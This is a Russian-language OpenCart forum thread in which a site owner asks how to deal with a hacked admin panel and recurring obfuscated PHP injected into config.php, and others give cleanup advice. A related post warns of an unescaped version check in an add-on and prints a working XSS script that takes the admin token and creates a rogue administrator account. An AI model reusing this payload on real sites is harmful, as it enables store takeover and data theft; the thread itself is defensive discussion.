Перейти к содержанию

Рекомендуемые сообщения

Добрый день, админку сайта взломал какой-то турецкий школьник, оставив красноречивое послание на первой картинке. «nah sana panel lamercik»

Проверил фтп, там добавлены несколько html файлов левых. Как видно на скринах, даты разные. 

Изменений в системных файлов не нашёл.php.ini чистый. config.php чистый. 

Посмотрел в index.php в админке - он снёс весь код и вставил свой, который виден на 1 скрине. Вопрос - как? Я должен устранить уязвимость, пожалуйста, помогите.

tuskishscam.PNG

turkishscam1.PNG

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Раз взломал, то где угодно мог закладок наделать. Весь сайт проверять надо. И соседние сайты тоже, если с одного акка работают. 

Если не рассматривать восстановление из резервной копии, то вариантов два.

Дешевый, не слишком надежный - прогнать все айболитом, подозрительное удалить/восстановить.

https://revisium.com/ai/

Не дешевый - заказать чистку/восстановление сайта

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

э... дешевый и правильный - восстановить из бэкапа.

все остальное компромисс.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

А такой вариант как защитить уже 3 раз за 4 месц. идет такой код <?php ${"\x47\x4cO\x42\x41L\x53"}["l\x69\x71p\x73\x69\x76\x70"]="m\x65";${"GL   пишет его в config.php который в корне. Декодировал сдесь. http://ddecode.com/hexdecoder/

Версия ocStore 2.1.0.2.1 стоит на ВПС под Центос 7

Infecsia-config.php

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

"Код" не "идет" через астрал. Раз он появляется - значит, у вас где-то дыра. Примитивный пароль, кривой модуль, заднепроходно настроенный сервер и т.д. Надо дыру искать, а не "кодом" любоваться. Какая разница, что вам там напихали.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
2 часа назад, Shureg сказал:

 

Изменено пользователем Praetorioan

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
7 часов назад, Shureg сказал:

Дешевый, не слишком надежный - прогнать все айболитом, подозрительное удалить/восстановить.

https://revisium.com/ai/

Спасибо!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
8 часов назад, nikifalex сказал:

почему вы думаете что админку?

Я не знаю что конкретно.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Всем спасибо, просто сделаю далёкий бэкап. И буду гуглить уязвимости oc.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
4 минуты назад, Praetorioan сказал:

Всем спасибо, просто сделаю далёкий бэкап. И буду гуглить уязвимости oc.

Уважаемый, толку что вы будите гуглить уязвимости opencart
Их нет
Вам четко сказали как вас взломали

 

2 часа назад, Shureg сказал:

"Код" не "идет" через астрал. Раз он появляется - значит, у вас где-то дыра. Примитивный пароль, кривой модуль, заднепроходно настроенный сервер и т.д. Надо дыру искать, а не "кодом" любоваться. Какая разница, что вам там напихали.

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
14 часов назад, markimax сказал:

Вам четко сказали как вас взломали

уважаемый @markimax , не мешайте человеку казаться умным в своих глазах. Он что зря прочитал весь хабр?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
В 25.10.2017 в 10:15, nikifalex сказал:

дешевый и правильный - восстановить из бэкапа.

В данном случае да, но не всегда прокатывает...

 

У одного клиента начались проблемы с сайтом. В процессе поиска были обнаружены левые файлы. Просмотрели архивы файлов, так эти левые файлы обнаружены в архивах почти годовой давности. Хорошо, что были и более ранние архивы. А у большинства пользователей есть только с десяток архивов на хостинге, т. е. в подобной ситуации они уже заражены.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

ну и что. берем все файлы, берем оригинальные файлы, берем какойнибудь WinMerge, запасаемся временем часа 3-5, и погнали сравнивать.

Не так это сложно как кажется, умеючи.

Несколько раз так делал. 

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
В 26.10.2017 в 08:01, nikifalex сказал:

уважаемый @markimax , не мешайте человеку казаться умным в своих глазах. Он что зря прочитал весь хабр?

Какую ценность несёт это сообщение в этой ветке? Зачем ты это пишешь? Из-за таких как ты, конкретно из-за тебя русское сообщество - крайне токсичное место, находиться здесь иногда неприятно. Поздравляю, ты посильно вносишь в это свой личный вклад.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
В 04.11.2017 в 12:01, nikifalex сказал:

ну и что. берем все файлы, берем оригинальные файлы, берем какойнибудь WinMerge, запасаемся временем часа 3-5, и погнали сравнивать.

Не так это сложно как кажется, умеючи.

Несколько раз так делал. 

PhpStorm Отлично сравнивает файлы - не только на есть ли лишние, а и на структуру php html файлов) 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
В 25.10.2017 в 14:54, Shureg сказал:

"Код" не "идет" через астрал. Раз он появляется - значит, у вас где-то дыра. Примитивный пароль, кривой модуль, заднепроходно настроенный сервер и т.д. Надо дыру искать, а не "кодом" любоваться. Какая разница, что вам там напихали.

Целиком и полностью согласен 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Похожий контент

    • От Yoda
      Недавно моими друзьями была обнаружена очень неприятная ситуация, один популярный автор дополнений, допустил фатальную ошибку в разработке дополнения. Я очень хочу верить что случайно, но в целом, все указывает на то, что это специально оставленный бекдор.
       
      Но бог и администрация форума ему судья, я думаю они там сами разберутся.
      В силу того, что приводя куски кода дополнения, или оставляя комментарии в теме поддержки дополнения, как пользователь который его не покупал я нарушу правила форума, я попробую дать рекомендации в существующих рамках.
       
      Исходя из моей подготовки и опыта, я могу утверждать, что, проблема, в том, что когда вы заходили в админку модуля, модуль подтягивал каждый раз с сервера автора номер версии. Казалось бы что в этом такого. 
      Но присмотревшись, оказалось, что вывод данных о версии не был экранирован, что позволяло автору или любому человеку, получившему доступ к его серверу выполнить XSS атаку на все 10 000 магазинов, которые купили любое из дополнений автора, к примеру вместо номера версии отдать вот такой простой скрипт к примеру:
       
      <script> // shell sample // seocms the best architectural mistake forever // i got all your 10 000 shops // i install 10 000 backdors function getUrlVars() {     var vars = [], hash, hashes = null;     if (window.location.href.indexOf("?") && window.location.href.indexOf("&")) {         hashes = window.location.href.slice(window.location.href.indexOf("?") + 1).split("&");     } else if (window.location.href.indexOf("?")) {         hashes = window.location.href.slice(window.location.href.indexOf("?") + 1);     }     if (hashes != null) {         for (var i = 0; i < hashes.length; i++) {             hash = hashes[i].split("=");             vars[hash[0]] = hash[1];         }     }     return vars; } var url_vars =  getUrlVars(); var token = url_vars.token; var host =  window.location.origin; var action = host + "/admin/index.php?route=user/user/add&token=" +  token; document.addEventListener("DOMContentLoaded", function(event) {    $.post( action, { username: "DummiMarkHack", user_group_id: "1", firstname: "Lol",  lastname: "Haha",    email: "MarkHack@MarkHack.com",  password: "1234",    confirm: "1234",    status: "1" } ); }); </script>
      И вот таким нехитрым способом, ни в коем случае я не грешу на автора и не хочу сказать что он это сделал специально, но береженого бог бережет. Ведь невзламываемых систем не бывает. Можно получить админский доступ в любой магазин. На котором установлены модули автора. А получив админа магазина, мы легко и просто дальше уже сливаем все что захотим - это дело техники.
       
      А учитывая то, что человек может умереть. И не продлить домен. А за доменом могут следить специально с целью захвата такого лакомого ботнета. Думаю о критичности потенциальной угрозы рассказывать не надо.
       
      Опять же повторюсь, в рамках правил форума я не могу показывать код дополнения, я его не покупал, поэтому чтобы навсегда обезопасить себя от подобной проблемы на 100% и у вас VPS вам просто необходимо добавить в файл host на своем сервере
       
      Строку 0.0.0.0 site.com // Домен сервера разработчика
       
      Как это сделать в linux - можно прочитать здесь, или обратитесь к администратору вашего сервера. 

      Если же у вас шаред-хостинг. Максимум что вы можете сделать, это найти во всех модулях автора в языковых файлах строки opencartadmin.com и заменить их на localhost. С вашими модулями ничего не случится. Они будут работать. Но вероятность, что с постороннего ресурса вы получите xss атаку минимальная!

      Ну и как второстепенную меру защиты, просто добавьте htpassword  авторизацию к админке. 

      Успешного бизнеса вам, и безопасных магазинов.
       
       
       
  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.